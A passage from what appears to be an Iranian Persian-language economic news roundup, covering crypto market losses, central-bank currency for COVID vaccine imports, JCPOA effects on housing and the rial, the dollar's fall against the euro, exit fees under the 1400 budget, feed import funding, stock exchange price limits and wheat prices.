طبق اعلام کوین مارکت، متوسط ریزش ارزهای دیجیتالی طی ۲۴ ساعت اخیر (تا ساعت ۱۴:۳۰ به وقت شرقی) ۱۰.۰۹ درصد بوده است. ارز فانتوم بیش از هر ارز دیگری ریزش داشته است. به دنبال این ریزش سنگین غیرمنتظره، حدود ۱۰ میلیارد دلار از سرمایه معامله گران بازار لیکویید شده است. (از بین رفتن تمام سرمایه به دلیل پیش بینی نادرست در هنگام استفاده از اهرم معاملاتی).

 

۱۴ : همتی: ۱۰۰ میلیون دلار برای خرید واکسن کرونا به وزارت بهداشت دادیم

عبدالناصر همتی در یادداشتی اینستاگرامی به تشریح آخرین وضعیت تامین ارز برای خرید واکسن کرونا پرداخت و نوشت:

ضرورت تأمین واکسن کرونا و انجام واکسیناسیون علیه ویروس کرونا قطعاً بایستی مهمترین دغدغه کشور باشد. بانک مرکزی از همان ابتدا علیرغم همه محدودیت های نقل و انتقال مالی ناشی از تحریم، تمام تلاش خود را برای تأمین فوری ارز موردنیاز واردات واکسن براساس سفارش وزارت بهداشت و درمان، به عمل آورده است. بر مبنای قرارداد کوواکس، ۱۷۸ میلیون دلار برای۱۶.۸میلیون دوز واکسن تخصیص و قسط اول آن نیز پرداخت و واردات آن آغاز شده است.

البته هرگونه درخواست و اعلام وزارت بهداشت جهت پرداخت ارز بابت واردات واکسن تأمین میشود. تا کنون نیز بر اساس میزان تقاضا و درخواست برای خرید واکسن از کشورهای روسیه و چین، ارز لازم تأمین و واردات انجام شده است. در حال حاضر نیز تخصیص ارز برای واردات با ارز نیمایی، براساس دستور رئیس جمهور، در اولویت تأمین می باشد، بنگاه های بزرگ توانمند می توانند در انجام مسئولیت هایی اجتماعی خود با هماهنگی وزارت بهداشت نقش آفرینی کنند.

امروز نیز،بانک مرکزی حداقل ۱۰۰میلیون دلار دیگر با نرخ ارز ترجیحی برای این منظور تخصیص داد تا با اعلام وزارت بهداشت پرداخت کند.این روند تأمین ارز برمبنای درخواستها تداوم خواهد داشت .

همتی: ۱۰۰ میلیون دلار برای خرید واکسن کرونا به وزارت بهداشت دادیم.

 

۱۵ : اثرات بازگشت احتمالی آمریکا به برجام بر بازارهای مالی

بهروز ملکی در نشست آنلاین “اثر بازگشت احتمالی آمریکا به برجام بر بازارهای مالی” درباره بازار مسکن گفت: حدود ۳۶ درصد هزینه‌های خانوار در زمینه مسکن صرف می‌شود و معادل ۷۰ درصد ثروت خانوار نیز در حوزه املاک وجود دارد که ۱۴ درصد اشتغال مستقیم هم در حوزه مسکن است.

وی با بیان اینکه سهم بخش خصوصی در سرمایه گذاری در مسکن معادل ۹۸ درصد و ارزش موجودی مسکن ۱۰ برابر نقدینگی کل کشور است،  افزود: رشد نقدینگی در سال‌های اخیر شدت گرفته و در دو تا سه سال گذشته شاهد افزایش تقاضای سرمایه‌ای در بازار مسکن هستیم که افزایش نرخ ارز و تحولات بورس عامل آن بوده‌اند. همچنین، پیش بینی می‌شود که مسکن سهم بیشتری در هزینه‌های خانوار نسبت سال‌های اخیر را به خود اختصاص داده است.

این کارشناس بازار مسکن ادامه داد: کل نیاز مسکن در کشور سالانه معادل ۸۰۰ هزار واحد است. در صورت بازگشت آمریکا به برجام اگر بتوانیم به شرایط سال‌های  ۱۳۹۴ یا  ۱۳۹۵ برگردیم که خیلی خوشبینانه است، بازار مسکن با تقاضا روبرو می‌شود.

ملکی با بیان اینکه عمده تاثیر مسکن از دلار خواهد بود، گفت: سه سال پیاپی است که بازار مسکن به رشد قیمت خود ادامه می‌دهد. در سال‌های  ۱۳۹۸ و  ۱۳۹۹ قیمت مسکن به اشباع رسیده و به صورت غیر عادی رشد زیادی داشته است.

شرط موفقیت اخذ مالیات از خانه‌های خالی 

وی تاکید کرد: باید منتظر دوره ثبات قیمت مسکن تا دو سال آینده باشیم که اگر توافق ایران و آمریکا محقق شود، می‌توان به این ثبات قیمت در مسکن امیدوار بود.

ملکی ادامه داد: عمده تعدیل قیمت در مسکن به صورت فرسایشی و زمانی است. موفقیت در اخذ مالیات از خانه‌های خالی به عملکرد سامانه املاک و اسکان بستگی دارد که خیلی به آن امیدوار نیستم.

ثبات در بازار ارز پس از بازگشت آمریکا به برجام 

در ادامه این نشست، مجید شاکری درباره بازار ارز گفت: چشم انداز نرخ ارز به دسترسی بانک مرکزی به منابع ارزی خود بستگی دارد. در دوره اولیه برگشت آمریکا به برجام تقاضا در بازار زیاد می‌شود که نرخ دلار را کاهش می‌دهد اما این کاهش به ۱۵ هزار تومان نمی‌رسد.

وی افزود: بعد از گذر از دوران اولیه توافق، کاهش قیمت در بازار ارز صورت می‌گیرد اما ثبات بلند مدت در این کاهش به سیاست‌های اقتصادی کشور چون تغییرات سایر نرخ‌ها چون نرخ بهره اسمی بستگی دارد.

 

۱۶ : دلار رکورد سقوط را زد!

در معاملات امروز بازارهای ارز آسیایی در حالی ارزش دلار به کمترین میزان در ۷ هفته گذشته رسید که ارزش یورو افزایش یافت.

در معاملات امروز بازارهای ارز آسیا ارزش دلار پایین آمد و یورو بالا رفت. دلیل کاهش ارزش دلار این است که همچنان نرخ سود اوراق بدهی وزارت خزانه داری آمریکا کمتر از میزان آن در ماه مارس است و به خاطر اینکه خوش بینی‌ها نسبت به تداوم روند واکسیناسیون در اروپا گسترش یافته، یورو مثبت شده است.

درواقع در سه ماه نخست سال جاری به خاطر بالا رفتن نرخ سود اوراق بدهی آمریکا، ارزش دلار رشد کرد و حالا دقیقا برعکس آن در حال رخ دادن است. در معاملات امروز شاخص ارزش دلار که ارزش آن را در برابر سبد ۶ ارز بین المللی می‌سنجد ۰.۱ درصد منفی شد و به ۹۰.۹۵ واحد رسید.

ارزش یورو هم ۰.۳ درصد رشد کرد و به ۱.۲۰ دلار رسید که بالاترین میزان در ۷ هفته گذشته به شمار می‌رود.

یوناپارک هگر، کارشناس کامرز بانک می‌گوید: دلیل افت ارزش دلار طی هفته‌های اخیر این است که بانک مرکزی آمریکا به بازار اطمینان داده که به این زودی‌ها قصد ندارد سیاست‌های حمایتی خود از اقتصاد آمریکا را پایان دهد.

برخی کارشناسان بر این باورند که یکی از اصلی‌ترین دلایل رشد یورو این بوده که اتحادیه اروپا اعلام کرده ۱۰۰ میلیون دز واکسن کرونا از دو شرکت فایزر و بایون تک خریده است.

 

۱۷ : ابلاغ عوارض خروج از کشور بر اساس قانون بودجه /عوارض مسافر عادی ۴۰۰ هزار تومان شد

عوارض خروج از کشور بر اساس اعلام وزارت اقتصاد و به موجب قانون بودجه ۱۴۰۰ ابلاغ شد.

بر اساس اعلام وزارت امور اقتصاد و دارایی و به موجب قانون بودجه سال ۱۴۰۰ کل کشور، عوارض خروج از کشور موضوع ماده (۴۵) قانون مالیات بر ارزش افزوده برای هر مسافر از تمام مرزهای کشور به شرح ذیل اعلام می گردد. (مبالغ به ریال).

نوع مسافر مرتبه اول در سال مرتبه دوم در سال مرتبه سوم و بالاتر در سال نوع مرز
مسافر عادی ۴۰۰۰۰۰۰ ۶۰۰۰۰۰۰ ۸۰۰۰۰۰۰ تمام مرزها
زائرین حج تمتع و عمره ۱۳۲۰۰۰۰ ۱۹۸۰۰۰۰ ۲۶۴۰۰۰۰ تمام مرزها
زاعرین عتبات

عالیات

۳۷۵۰۰۰
۱۲۵۰۰۰
۴۵۰۰۰۰
۱۵۰۰۰۰
۴۵۰۰۰۰
۱۵۰۰۰
مرز هوایی
مرز زمینی و دریایی
مرزنشینان ۷۵۰۰۰۰
۲۵۰۰۰۰
۶۰۰۰۰۰۰
۶۰۰۰۰۰۰
۸۰۰۰۰۰۰
۸۰۰۰۰۰۰
هوایی
زمینی و دریایی
ورزشکاران تیم های ملی با مجوز وزارت ورزش و جوانان ۲۶۴۰۰۰۰ ۲۶۴۰۰۰۰ ۲۶۴۰۰۰۰ تمام مرزها

تذکر ۱: عبارت تمام مرزها، شامل مرزهای زمینی، هوایی و دریایی می باشد.

تذکر ۲: ضروری است حسب مفاد دستورالعمل شماره ۴۴۳۵۳ مورخ ۱۳۹۷/۹/۱۹، شعب از دریافت وجوه یاد شده از طریق فیش نقدی خودداری نموده و مراجعین را برای پرداخت عوارض خروج از کشور به درگاه ها و کانال های پرداخت الکترونیکی راهنمایی نمایند.

 

۱۸ : چالش جدید برای واردات نهاده‌های دامی/تخصیص ارز از اسفند متوقف است

اتحادیه واردکنندگان نهاده‌های دامی در نامه‌ای به اسحاق جهانگیری معاون اول رئیس جمهوری با اشاره به عدم تخصیص ارز برای واردات نهاده‌های دامی از هفته‌های پایانی اسفند سال ۱۳۹۹ اعلام کرد: وقفه در پرداخت ارز حتی برای کوتاه مدت آثار زیان بار و غیرقابل جبرانی دارد.

در نامه این اتحادیه به معاون اول رئیس جمهوری آمده است:

ضمن آرزوی توفیق برای جنابعالی و قبولی طاعات، این اتحادیه حسب تکلیف ملی و تشکیلاتی خود لازم می‌داند به استحضار برساند از هفته پایانی سال ۹۹ تاکنون هیچ گونه تخصیص و تأمین ارز از طرف بانک مرکزی برای نهاده‌های دام و طیور انجام نشده است. این در حالی است که برنامه‌ریزی واردات کالاهای اساسی آن هم در شرایط بحرانی نیاز به اقدام به موقع، مستمر و بدون وقفه دارد و تخصیص ارز باید پیوستگی و استمرار داشته باشد. وقفه‌های عدم پرداخت ولو کوتاه مدت، آثار بسیار زیان باری دارد که به سادگی قابل جبران نیست. تجربه سال گذشته گواه این امر است.

لذا این تشکل موکداً از حضرتعالی استدعا دارد به این مقوله ورود عاجل فرموده و با درایت و شأن ورود خود دستور اقدام فوری برای تأمین و تخصیص ارز مورد نیاز واردات نهاده‌های دام و طیور انجام شده و رسوبی در گمرکات صادر نموده و کشور را از تنگنای حادث شده عبور دهید و از ریسک کمبود کالا و نوسانات قیمتی و عوارض آن پیشگیری فرمائید.
عزت و سربلندی جنابعالی را از حضرت حق خواهانیم.

لازم به ذکر است؛ به رغم واردات مطلوب کالای اساسی توسط بخش خصوصی و موجودی کالا در بنادر از سوی بانک مرکزی تخصیص ارز برای واردات نهاده‌های دامی صورت نگرفته است.

 

۱۹ : اتفاق مهمی در بورس رخ می‌دهد!

با شتاب گرفتن روند نزولی شاخص بورس، تصمیمات مهمی از سوی مسوولان حاضر در بازار سرمایه برای کاهش نوسان‌های ایجاد شده در بازار، کاهش ترس سهامداران از تداوم روند نزولی بازار و ضرر و زیان‌های سهامداران اعمال شد که در این راستا تغییر دامنه نوسان بورس از منفی و مثبت پنج به مثبت ۶ و منفی دو تاثیرگذارترین تصمیمی بود که در میان مصوبه‌های شورای‌عالی بورس قرار داشت.

به دنبال تصمیمات جدید اتخاذ شده، در جلسه ۱۸ بهمن‌ماه ۹۹ شورای‌عالی بورس مقرر شد تا از ۲۵ بهمن‌ماه دامنه نوسان خرید و فروش سهام از مثبت و منفی پنج به منفی ۲ تا مثبت ۶ درصد تغییر کند.

این تصمیم از اواخر بهمن ماه در بازار به اجرا در آمد و تا حدودی توانست از شدت نگرانی سهامداران برای از دست دادن سرمایه آنها بکاهد.

با اجرای چنین مصوبه‌ای در بازار بیشتر کارشناسان اظهارنظرهای مختلفی را نسبت به این تصمیم شورای‌عالی بورس مطرح کردند و معتقد به حذف دامنه نوسان بورس برای ایجاد هر چه زودتر تعادل در معاملات بازار بودند و بارها اعلام کردند که بازار برای آنکه بتواند هر چه زودتر به روند واقعی خود بازگردد باید اقدام به حذف یا افزایش دامنه نوسان کند تا مدت اصلاح زمانی شاخص بورس به زمان کوتاه تری تبدیل شود.

بعد از مطرح شدن چنین نظراتی از سوی فعالان حاضر در بازار، گمانه زنی هایی برای تغییر دوباره دامنه نوسان بورس به مثبت و منفی ۶ شنیده شد که این امر منجر به ترس سهامداران و شتاب در روند نزولی شاخص بورس در بازار شد، این در حالی است که این اقدام به مرحله اجرا نرسید و خبر موثقی از آن در بازار منعکس نشد.

با ایجاد شک و تردید سهامداران در بورس از ضرر و زیان‌های احتمالی و ایجاد هیجان برای خروج از این بازار، بار دیگر تکلیف دامنه نوسان برای مدتی معین از سوی هیات مدیره سازمان بورس و اوراق بهادار مشخص شد و اعضای هیات مدیره سازمان بورس و اوراق بهادار اقدام به تغییر دوباره دامنه نوسان از منفی دو تا مثبت ۶ به منفی سه تا مثبت ۶ کردند.

«محمدعلی دهقان‌دهنوی»، رئیس سازمان بورس پس از اعلام این خبر درباره زمان اعمال تغییر دامنه نوسان در بازار گفت: از آنجا که این موضوع پس از سه روز کاری قابل اعمال است، از ابتدای اردیبهشت دامنه نوسان جدید اعمال می‌شود و تا پایان اردیبهشت برقرار است، سپس سازمان بورس نسبت به افزایش تدریجی و مجدد تصمیم‌گیری می‌کند.

براساس وعده داده شده، دامنه نوسان از امروز (چهارشنبه) تغییر می‌کند و مطابق مصوبه هیات مدیره سازمان بورس و اوراق بهادار دامنه نوسان نرخ سهام در کلیه نمادهای معاملاتی در بورس تهران و بازارهای اول و دوم فرابورس تا اطلاع ثانوی به مثبت ۶ و منفی سه درصد تغییر می‌کند.

 

۲۰ : افزایش هزار تومانی قیمت گندم مشمول کشاورزانی که محصول خود را تحویل داده اند نیز می‌شود

شرکت بازرگانی دولتی ایران اعلام کرد که کشاورزانی که گندم خود را با نرخ ۴ هزار تومان و پیش از افزایش قیمت هزار تومانی تحویل داده اند نیز مشمول قیمت جدید می شوند و ما به التفاوت به حساب آنها واریز می‌شود.

بعد از افزایش هزار تومانی قیمت خرید تضمینی گندم و تغییر قیمت این محصول از ۴ هزار تومان به ۵ هزار تومان شرکت بازرگانی دولتی ایران که مسئول دریافت و خرید تضمینی گندم کشاورزان است اعلام کرد: کشاورزانی که گندم خود را با نرخ ۴ هزار تومان و پیش از افزایش قیمت هزار تومانی تحویل داده اند نیز مشمول قیمت جدید می شوند و ما به التفاوت به حساب آنها واریز می‌شود.

روحانی: اجازه ندادیم قحطی کالا در کشور رخ بدهد/ پرداخت جایزه تسریع در تحویل گندم به کشاورزان

اطلاعیه شرکت مادر تخصصی بازرگانی دولتی ایران در رابطه با جایزه تحویل گندم به شرح زیر است:

به منظور تحقق شعار سال و پشتیبانی از تولید، با موافقت ریاست محترم جمهوری و تصویب سازمان برنامه و بودجه، جایزه ۱۰ هزار ریالی به ازای تحویل هر کیلوگرم گندم در نظر گرفته شده است.
لذا جای هیچگونه نگرانی برای کشاورزانی که تاکنون گندم خود را به مراکز خرید تحویل داده و یا در حال تحویل می باشند وجود ندارد و به محض مشخص شدن سازوکار و روش اجرایی آن، این جایزه به همه گندم کارانی که محصول خود را به مراکز خرید این شرکت تحویل بدهند تعلق خواهد گرفت.

روابط عمومی شرکت مادر تخصصی بازرگانی دولتی ایران

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران